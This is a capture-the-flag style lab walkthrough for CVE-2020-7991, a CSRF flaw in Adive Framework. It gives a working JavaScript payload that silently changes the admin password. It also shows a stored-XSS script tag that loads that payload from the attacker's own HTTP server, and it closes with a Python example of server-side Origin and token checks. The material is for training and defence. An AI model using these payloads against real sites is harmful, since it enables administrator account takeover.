[CVE-2020-7991] CSRF in Adive Framework
CVE-2020-7991 is a CSRF (cross-site request forgery) issue in Adive Framework versions 2.0.8 and earlier. The vulnerability allows an attacker to change the administrator's password.
Adive Framework is a free and open-source application written in PHP.
Lab Scenario
We have set up the following scenario in our Attack-Defense labs for our students to practice on. The screenshots have been taken from our online lab environment.
Lab: Vulnerable Adive Framework Instance
This lab comprises a Kali machine (192.149.43.2) and a web server (192.149.43.3 or target-1). The practitioner gets graphical (GUI) access to the Kali machine through the web browser.
Challenge Statement
The following username and password may be used to explore the application and/or find a vulnerability that might require authenticated access:
- Username: admin
- Password: admin
Objective: Exploit the vulnerability and take over the admin account of the target.
Solution
Step 1: Check the IP address of the host machine.
Step 2: Perform an Nmap scan of the target machine.
The Apache web server is running on port 80 of the target machine.
Step 3: Open the web application in the browser.
Step 4: Search "CVE-2020-7991 exploit-db" on Google.
Check the Exploit-DB link. The entry contains the script that can be used to exploit the vulnerability.
Exploit DB Link: https://www.exploit-db.com/exploits/47966
Step 5: Navigate to the admin login by clicking on the Dashboard.
Step 6: The user has to authenticate in order to exploit the vulnerability. Use the credentials provided in the challenge statement.
Credentials:
- Username: admin
- Password: admin
URL: http://vt3sq72fu6tyxbjq4n7b3ptyh.stager3.attackdefenselabs.com/
Admin Dashboard
Step 7: Copy the JavaScript payload and replace the URL with the address of your lab's target machine.

```javascript
// Payload from the Exploit-DB entry; the host in nuri must match your lab target.
function execute() {
    var nuri = "http://192.149.43.3/admin/config";
    var xhttp = new XMLHttpRequest();
    xhttp.open("POST", nuri, true);
    xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    xhttp.withCredentials = "true"; // send the victim's session cookie with the request
    var body = "";
    body += "\r\n\r\n";
    body += "userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
    xhttp.send(body);
    return true;
}
execute();
```

Save the exploit as "exploit.js".
Step 8: Start a Python HTTP server on port 80 of the Kali machine, in the directory containing exploit.js.
Command: python3 -m http.server 80
Step 9: Navigate to the configuration section by clicking on the Configuration Button.
Click on ‘MANAGE DASHBOARD USERS’ button.
Step 10: Click on the Create new user button.
Step 11: Modify the URL in the XSS payload provided on Exploit-DB, then inject the payload into the 'Name' text field and fill in any other required fields.
Payload: <script src="http://192.149.43.2/exploit.js"></script>
Click on the ‘CREATE USER’ button.
Step 12: Check the python server.
The server log shows exploit.js being fetched, so the script was triggered and the password of user admin has been changed to hacked@123.
Step 13: Logout and login again with the new credentials to verify the exploitation.
The credentials have been successfully modified by exploiting the CSRF vulnerability.
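The request exploit.js sends is accepted because /admin/config checks only the session cookie. The following added example (not code from Adive Framework or the write-up) shows the two server-side checks such a handler needs, a same-site Origin/Referer check and a per-session synchronizer token, and runs them against the exact form body from the payload above; the SITE_ORIGIN, session dictionary and csrf_token field name are assumptions for the demonstration.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Origin of the legitimate application (the lab's target host from the write-up).
SITE_ORIGIN = "http://192.149.43.3"


def issue_csrf_token(session: dict) -> str:
    """Synchronizer token: created once per session, kept server-side and
    embedded as a hidden field in the /admin/config form."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]


def validate_admin_config_request(headers: dict, body: str, session: dict):
    """Vet a POST to /admin/config before touching the password.
    Returns (accepted, reason); header names are matched case-insensitively."""
    h = {k.lower(): v for k, v in headers.items()}
    form = {k: v[0] for k, v in parse_qs(body).items()}

    # 1. Source check: Origin (Referer as fallback) must be exactly our own site.
    src = urlsplit(h.get("origin") or h.get("referer", ""))
    if f"{src.scheme}://{src.netloc}" != SITE_ORIGIN:
        return False, "cross-site request from " + (src.netloc or "unknown")

    # 2. Token check: the submitted token must equal the session's token.
    expected = session.get("csrf_token", "")
    submitted = form.get("csrf_token", "")
    if not expected or not hmac.compare_digest(expected.encode(), submitted.encode()):
        return False, "missing or invalid csrf_token"

    # 3. Only now act on the request itself.
    if form.get("pass") != form.get("cpass"):
        return False, "password confirmation mismatch"
    return True, f"password for {form.get('userName')} updated"


# Constructed sample: the body exploit.js sends (it carries no token field).
EXPLOIT_BODY = ("userName=Administrator&confPermissions=1"
                "&pass=hacked@123&cpass=hacked@123&invokeType=web")

if __name__ == "__main__":
    session = {}
    # Attacker-hosted page: stopped by the Origin check.
    print(validate_admin_config_request({"Origin": "http://192.149.43.2"}, EXPLOIT_BODY, session))
    # Same-origin script (the lab's stored payload): stopped by the token check.
    print(validate_admin_config_request({"Origin": SITE_ORIGIN}, EXPLOIT_BODY, session))
    # Legitimate form post carrying the session's token: accepted.
    good = EXPLOIT_BODY + "&csrf_token=" + issue_csrf_token(session)
    print(validate_admin_config_request({"Origin": SITE_ORIGIN}, good, session))
```

In the lab the script runs inside the admin's own page via the stored 'Name' field, so it could also read the token from the DOM; closing that delivery path is an output-encoding fix for the user form, which this example does not cover.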